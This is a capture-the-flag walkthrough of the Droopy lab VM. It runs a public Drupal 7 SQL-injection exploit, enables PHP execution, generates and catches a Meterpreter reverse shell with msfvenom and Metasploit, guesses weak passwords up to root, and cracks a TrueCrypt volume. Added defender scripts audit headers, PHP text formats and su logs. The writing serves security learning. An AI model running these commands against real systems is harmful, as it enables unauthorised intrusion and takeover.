Droopy CTF VM Walkthrough

Today I’m trying to get into the Droopy CTF virtual machine. I’ll be laying out the steps I took to solve it.

So the first step is to scan the network for the VM's IP address.

Only port 80 (http) was open.

By running nikto I found:

root@pss:~/ctf/droopyCTF# nikto -h http://192.168.1.35
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.35
+ Target Hostname:    192.168.1.35
+ Target Port:        80
+ Start Time:         2017-03-27 18:46:30 (GMT-3)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.5
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-generator' found, with contents: Drupal 7 (http://drupal.org)
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /scripts/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x60e 0x4fef78de7d280 
+ OSVDB-3268: /includes/: Directory indexing found.
+ Entry '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /misc/: Directory indexing found.
+ Entry '/misc/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /modules/: Directory indexing found.
+ Entry '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /profiles/: Directory indexing found.
+ Entry '/profiles/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/scripts/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /themes/: Directory indexing found.
+ Entry '/themes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.mysql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.pgsql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.sqlite.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/install.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/LICENSE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/MAINTAINERS.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/UPGRADE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/xmlrpc.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 36 entries which should be manually viewed.
+ Multiple index files found: /index.php, /index.html
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-3092: /web.config: ASP config file is accessible.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /misc/: This might be interesting...
+ OSVDB-3092: /scripts/: This might be interesting... possibly a system shell found.
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3092: /UPGRADE.txt: Default file found.
+ OSVDB-3092: /install.php: Drupal install.php file found.
+ OSVDB-3092: /install.php: install.php file found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /INSTALL.mysql.txt: Drupal installation file found.
+ OSVDB-3233: /INSTALL.pgsql.txt: Drupal installation file found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-3268: /sites/: Directory indexing found.
+ 8383 requests: 0 error(s) and 52 item(s) reported on remote host
+ End Time:           2017-03-27 18:47:28 (GMT-3) (58 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

A “drupal 7” search on exploit-db gave me a bunch of options to try. I chose this one:

https://www.exploit-db.com/exploits/34992/
root@pss:~/ctf/droopyCTF# python 34992.py -t http://192.168.1.35 -u admin -p admin

  ______                          __     _______  _______ _____    
 |   _  \ .----.--.--.-----.---.-|  |   |   _   ||   _   | _   |   
 |.  |   \|   _|  |  |  _  |  _  |  |   |___|   _|___|   |.|   |   
 |.  |    |__| |_____|   __|___._|__|      /   |___(__   `-|.  |   
 |:  1    /          |__|                 |   |  |:  1   | |:  |   
 |::.. . /                                |   |  |::.. . | |::.|   
 `------'                                 `---'  `-------' `---'   
  _______       __     ___       __            __   __             
 |   _   .-----|  |   |   .-----|__.-----.----|  |_|__.-----.-----.
 |   1___|  _  |  |   |.  |     |  |  -__|  __|   _|  |  _  |     |
 |____   |__   |__|   |.  |__|__|  |_____|____|____|__|_____|__|__|
 |:  1   |  |__|      |:  |    |___|                               
 |::.. . |            |::.|                                        
 `-------'            `---'                                        
                                                                   
                                 Drup4l => 7.0 <= 7.31 Sql-1nj3ct10n
                                              Admin 4cc0unt cr3at0r

			  Discovered by:

			  Stefan  Horst
                         (CVE-2014-3704)

                           Written by:

                         Claudio Viviani

                      http://www.homelab.it

                         info@homelab.it
                     homelabit@protonmail.ch

                 https://www.facebook.com/homelabit
                   https://twitter.com/homelabit
                 https://plus.google.com/+HomelabIt1/
       https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww


[!] VULNERABLE!

[!] Administrator user created!

[*] Login: admin
[*] Pass: admin
[*] Url: http://192.168.1.35/?q=node&destination=node
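As an added defender-side example (not code from the walkthrough or from the exploit author), here is the check a site owner could run to catch what both the nikto run and the Drupalgeddon banner above point at: the missing defensive headers, the version disclosures in Server / X-Powered-By / X-Generator, and a Drupal release inside the CVE-2014-3704 (SA-CORE-2014-005) range, 7.0 through 7.31. The sample response is constructed to match the headers nikto reported; the CHANGELOG.txt first line is the format Drupal 7 ships in its web root ("Drupal 7.31, 2014-07-24").

```python
"""Audit an HTTP response for the disclosures nikto reported above.

Added example, not part of the original walkthrough. parse_headers() reads a
raw response (the sample below is constructed to match the headers nikto
listed), audit() reports the missing defensive headers and the version
disclosures, and, given the first line of Drupal's CHANGELOG.txt, flags
releases in the CVE-2014-3704 (SA-CORE-2014-005) range, 7.0 through 7.31.
"""
import re
from typing import Dict, List, Optional, Tuple

# Defensive headers nikto reported as absent, with the fix a defender would apply.
EXPECTED_HEADERS = {
    "x-frame-options": "add X-Frame-Options: SAMEORIGIN (or a CSP frame-ancestors directive)",
    "x-content-type-options": "add X-Content-Type-Options: nosniff",
    "x-xss-protection": "legacy header; a Content-Security-Policy is the modern equivalent",
}

# Headers that reveal the web server, language runtime or CMS.
DISCLOSING_HEADERS = ("server", "x-powered-by", "x-generator")

# Constructed sample response reproducing the headers from the nikto run.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.7 (Ubuntu)\r\n"
    "X-Powered-By: PHP/5.5.9-1ubuntu4.5\r\n"
    "X-Generator: Drupal 7 (http://drupal.org)\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "\r\n"
    "<html><body>Droopy</body></html>"
)


def parse_headers(raw: str) -> Dict[str, str]:
    """Return response headers keyed by lower-cased name; status line and body are dropped."""
    head, _, _body = raw.partition("\r\n\r\n")
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def drupal_version(changelog_first_line: str) -> Optional[Tuple[int, int]]:
    """Parse 'Drupal 7.31, 2014-07-24' into (7, 31); None if the line does not match."""
    m = re.match(r"Drupal (\d+)\.(\d+)", changelog_first_line.strip())
    return (int(m.group(1)), int(m.group(2))) if m else None


def vulnerable_to_cve_2014_3704(version: Optional[Tuple[int, int]]) -> bool:
    """SA-CORE-2014-005 affects Drupal 7.0 through 7.31; 7.32 carries the fix."""
    return version is not None and (7, 0) <= version <= (7, 31)


def audit(raw: str, changelog_first_line: Optional[str] = None) -> List[str]:
    """Collect findings from the headers and, optionally, the CHANGELOG version."""
    headers = parse_headers(raw)
    findings: List[str] = []
    for name, advice in EXPECTED_HEADERS.items():
        if name not in headers:
            findings.append(f"missing {name}: {advice}")
    for name in DISCLOSING_HEADERS:
        if name in headers:
            findings.append(f"disclosure via {name}: {headers[name]}")
    version = drupal_version(changelog_first_line) if changelog_first_line else None
    if vulnerable_to_cve_2014_3704(version):
        findings.append(
            f"Drupal {version[0]}.{version[1]} is in the CVE-2014-3704 range; upgrade to 7.32 or later"
        )
    return findings


if __name__ == "__main__":
    # Constructed CHANGELOG line for a site still on 7.31.
    for finding in audit(SAMPLE_RESPONSE, "Drupal 7.31, 2014-07-24"):
        print(finding)
```

The X-Generator header alone only says "Drupal 7"; the CHANGELOG line (or the admin status report) is what turns that into a patch decision, which is why the version check is a separate function here.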

So now I have credentials to log in and upload a reverse shell, so let's do that. But first I needed a little trick to allow PHP content to be run: enabling the PHP filter module and creating a page that uses the PHP code text format.

[Screenshots: logged in; enabling the PHP filter; PHP code text format added]
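The PHP filter step above is the part a site owner can detect: once the php module is enabled and a text format carries its php_code filter, anyone who can edit content with that format can run PHP on the server. As an added example (not from the walkthrough), the check below runs the two queries a defender would run against a Drupal 7 database. It uses an in-memory SQLite copy of the three tables involved (system, filter_format, filter), trimmed to the columns the check needs, with constructed rows that mirror the state the walkthrough creates.

```python
"""Detect an enabled PHP filter module or PHP-evaluating text format in Drupal 7.

Added example, not part of the walkthrough. The schema is a trimmed copy of
Drupal 7's system, filter_format and filter tables (only the columns used
here); the rows are constructed to reflect the walkthrough's changes.
"""
import sqlite3
from typing import Dict, List, Sequence, Tuple

SCHEMA = """
CREATE TABLE system (name TEXT, type TEXT, status INTEGER);
CREATE TABLE filter_format (format TEXT, name TEXT, status INTEGER);
CREATE TABLE filter (format TEXT, module TEXT, name TEXT, status INTEGER);
"""

# Constructed rows: php module enabled, plus the "PHP code" format
# (machine name php_code) that the php module installs, with its filter active.
SAMPLE_ROWS: Dict[str, Sequence[tuple]] = {
    "system": [("node", "module", 1), ("php", "module", 1)],
    "filter_format": [("filtered_html", "Filtered HTML", 1), ("php_code", "PHP code", 1)],
    "filter": [
        ("filtered_html", "filter", "filter_html", 1),
        ("php_code", "php", "php_code", 1),
    ],
}

# Constructed rows for a clean site: php module present but disabled, no PHP format.
CLEAN_ROWS: Dict[str, Sequence[tuple]] = {
    "system": [("node", "module", 1), ("php", "module", 0)],
    "filter_format": [("filtered_html", "Filtered HTML", 1)],
    "filter": [("filtered_html", "filter", "filter_html", 1)],
}

PHP_MODULE_QUERY = "SELECT status FROM system WHERE type = 'module' AND name = 'php'"

# Any enabled text format that runs a filter provided by the php module.
PHP_FORMAT_QUERY = """
SELECT ff.format, ff.name
FROM filter f
JOIN filter_format ff ON ff.format = f.format
WHERE f.module = 'php' AND f.status = 1 AND ff.status = 1
ORDER BY ff.format
"""


def load_db(rows: Dict[str, Sequence[tuple]] = SAMPLE_ROWS) -> sqlite3.Connection:
    """Build the in-memory database and insert the given rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    for table, data in rows.items():
        if not data:
            continue
        placeholders = ",".join("?" * len(data[0]))
        conn.executemany(f"INSERT INTO {table} VALUES ({placeholders})", data)
    conn.commit()
    return conn


def php_module_enabled(conn: sqlite3.Connection) -> bool:
    row = conn.execute(PHP_MODULE_QUERY).fetchone()
    return bool(row and row[0] == 1)


def php_text_formats(conn: sqlite3.Connection) -> List[Tuple[str, str]]:
    return [tuple(r) for r in conn.execute(PHP_FORMAT_QUERY).fetchall()]


def audit(conn: sqlite3.Connection) -> List[str]:
    """Return one finding per risky setting; an empty list means nothing found."""
    findings: List[str] = []
    if php_module_enabled(conn):
        findings.append("php module enabled: content editors with a PHP text format get code execution")
    for fmt, name in php_text_formats(conn):
        findings.append(f"text format '{name}' ({fmt}) evaluates PHP; disable the format or drop its php_code filter")
    return findings


if __name__ == "__main__":
    for finding in audit(load_db()):
        print(finding)
```

On a live site the module half of this check is also available as drush pm-list --status=enabled --type=module; the text-format half has to come from the database or from the Text formats admin page, which is why the query is worth keeping in an audit script.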

I created a reverse shell with msfvenom as follows:

root@pss:~/ctf/droopyCTF# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.38 LPORT=6000 R > shell.txt 
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 948 bytes

And added the page to the site :)


root@pss:~/ctf/droopyCTF# msfconsole 
                                                  

MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        http://metasploit.com


Payload caught by AV? Fly under the radar with Dynamic Payloads in
Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.13.21-dev                         ]
+ -- --=[ 1621 exploits - 924 auxiliary - 282 post        ]
+ -- --=[ 472 payloads - 39 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use 
Display all 3347 possibilities? (y or n)
msf > use p
Display all 754 possibilities? (y or n)
msf > use 
Display all 3347 possibilities? (y or n)Interrupt: use the 'exit' command to quit
msf > use exploit/multi/handler 
msf exploit(handler) > set payload phpInterrupt: use the 'exit' command to quit
msf exploit(handler) > use payload php/meterpreter/reverse_tcp

^C[-] Error while running command use: 
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.38
LHOST => 192.168.1.38
msf exploit(handler) > set LPORT 6000
LPORT => 6000
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.38     yes       The listen address
   LPORT  6000             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit 

[*] Started reverse TCP handler on 192.168.1.38:6000 
[*] Starting the payload handler...
[*] Sending stage (33986 bytes) to 192.168.1.35
[*] Meterpreter session 1 opened (192.168.1.38:6000 -> 192.168.1.35:46294) at 2017-03-27 20:17:45 -0300

meterpreter > shell
Process 1211 created.
Channel 1 created.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

python -c 'import pty; pty.spawn("/bin/bash");'
www-data@droopy:/var/www/html$ 
www-data@droopy:/var/www/html$ su gsuser
su gsuser
Password: gsuser

gsuser@droopy:/var/www/html$ su
su
Password: toor

root@droopy:/var/www/html# cd ~
cd ~
root@droopy:~# ls -la
ls -la
total 5148
drwx------  3 root root    4096 Apr 12  2016 .
drwxr-xr-x 22 root root    4096 Apr 10  2016 ..
-rw-r--r--  1 root root    3106 Feb 20  2014 .bashrc
drwx------  2 root root    4096 Apr 10  2016 .cache
-rw-r--r--  1 root root 5242880 Apr 12  2016 dave.tc
-rw-r--r--  1 root root     140 Feb 20  2014 .profile
-rw-------  1 root root    3771 Apr 11  2016 .viminfo

The main issue with this VM is that the passwords were too weak: gsuser's took a couple of tries, and after playing a bit with the root account I found it had the same default root password as the Kali images for BeagleBone and Raspberry Pi, toor.
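The escalation above is two su calls, www-data to gsuser and gsuser to root, and on an Ubuntu host each one leaves a line in /var/log/auth.log. As an added example (not from the walkthrough), the parser below reads su messages in the shape shadow's su writes them ("Successful su for X by Y" / "FAILED su for X by Y"; the sample lines are constructed) and raises alerts for two things a defender cares about here: any su originating from a service account such as www-data, and any su, successful or not, whose target is root.

```python
"""Flag su-based privilege escalation from service accounts in auth.log.

Added example, not part of the walkthrough. The log lines are constructed
in the format shadow's su logs to syslog on Ubuntu; the service-account
list is a starting point, not an exhaustive one.
"""
import re
from typing import Dict, List, Set

# Accounts that run daemons and should never be switching user.
SERVICE_ACCOUNTS: Set[str] = {"www-data", "nobody", "mysql", "postgres"}

# Constructed sample, modelled on the session in the walkthrough.
SAMPLE_AUTH_LOG = """\
Mar 27 20:17:45 droopy su[1213]: Successful su for gsuser by www-data
Mar 27 20:17:45 droopy su[1213]: + /dev/pts/0 www-data:gsuser
Mar 27 20:18:02 droopy su[1220]: FAILED su for root by gsuser
Mar 27 20:18:09 droopy su[1221]: Successful su for root by gsuser
Mar 27 20:18:09 droopy su[1221]: + /dev/pts/0 gsuser:root
Mar 27 20:25:00 droopy sshd[1300]: Accepted password for gsuser from 192.168.1.38 port 50122 ssh2
"""

SU_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) su\[(?P<pid>\d+)\]: "
    r"(?P<result>Successful|FAILED) su for (?P<target>\S+) by (?P<origin>\S+)$"
)


def parse_su_events(text: str) -> List[Dict[str, str]]:
    """Return one dict per su attempt; lines that are not su results are skipped."""
    events: List[Dict[str, str]] = []
    for line in text.splitlines():
        m = SU_RE.match(line)
        if m:
            events.append(m.groupdict())
    return events


def suspicious(events: List[Dict[str, str]], service_accounts: Set[str] = SERVICE_ACCOUNTS) -> List[str]:
    """Alert on su from a service account, and on any attempt to become root."""
    alerts: List[str] = []
    for e in events:
        outcome = e["result"].lower()
        if e["origin"] in service_accounts:
            alerts.append(
                f"{e['ts']} {e['host']}: {outcome} su from service account "
                f"{e['origin']} to {e['target']} (pid {e['pid']}) - likely web shell"
            )
        elif e["target"] == "root":
            alerts.append(
                f"{e['ts']} {e['host']}: {outcome} su to root by {e['origin']} (pid {e['pid']})"
            )
    return alerts


def escalation_chain(events: List[Dict[str, str]]) -> List[str]:
    """Follow successful su hops to list the accounts reached from each origin."""
    reached: Dict[str, List[str]] = {}
    for e in events:
        if e["result"] == "Successful":
            reached.setdefault(e["origin"], []).append(e["target"])
    return [f"{origin} -> {', '.join(targets)}" for origin, targets in reached.items()]


if __name__ == "__main__":
    found = parse_su_events(SAMPLE_AUTH_LOG)
    for alert in suspicious(found):
        print(alert)
    for hop in escalation_chain(found):
        print(hop)
```

The failed attempt is kept in the alerts on purpose: on this VM root fell to a default password after "playing a bit", and a run of FAILED lines followed by a Successful one is exactly that pattern.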

I copied dave.tc to the webroot, and downloaded it to my kali box.


dave.tc is a TrueCrypt volume, so I cracked its password with truecrack -t dave.tc --wordlist dict.txt, which took a hell of a time… The password was etonacademy.

I downloaded TrueCrypt from https://sourceforge.net/projects/truecrypt/files/TrueCrypt/Other/TrueCrypt-7.2-Linux-x86.tar.gz/download and mounted the volume using that password…


and… Done! Got the flag!

root@pss:~# cd /media/truecrypt1/
root@pss:/media/truecrypt1# ls -la
total 20
drwxr-xr-x 6 root root  1024 Apr 12  2016 .
drwxr-xr-x 4 root root  4096 Mar 28 17:30 ..
drwxr-xr-x 2 root root  1024 Apr 12  2016 buller
drwx------ 2 root root 12288 Apr 12  2016 lost+found
drwxr-xr-x 2 root root  1024 Apr 12  2016 panama
drwxr-xr-x 3 root root  1024 Apr 12  2016 .secret
root@pss:/media/truecrypt1# cat .secret/
piers.png  .top/
root@pss:/media/truecrypt1# cat .secret/.top/flag.txt 

################################################################################
#   ___ ___  _  _  ___ ___    _ _____ _   _ _      _ _____ ___ ___  _  _  ___  #
#  / __/ _ \| \| |/ __| _ \  /_\_   _| | | | |    /_\_   _|_ _/ _ \| \| |/ __| #
# | (_| (_) | .` | (_ |   / / _ \| | | |_| | |__ / _ \| |  | | (_) | .` |\__ \ #
#  \___\___/|_|\_|\___|_|_\/_/ \_\_|  \___/|____/_/ \_\_| |___\___/|_|\_||___/ #
#                                                                              #
################################################################################

Firstly, thanks for trying this VM. If you have rooted it, well done!

Shout-outs go to #vulnhub for hosting a great learning tool. A special thanks
goes to barrebas and junken for help in testing and final configuration.
                                                                    --knightmare
root@pss:/media/truecrypt1#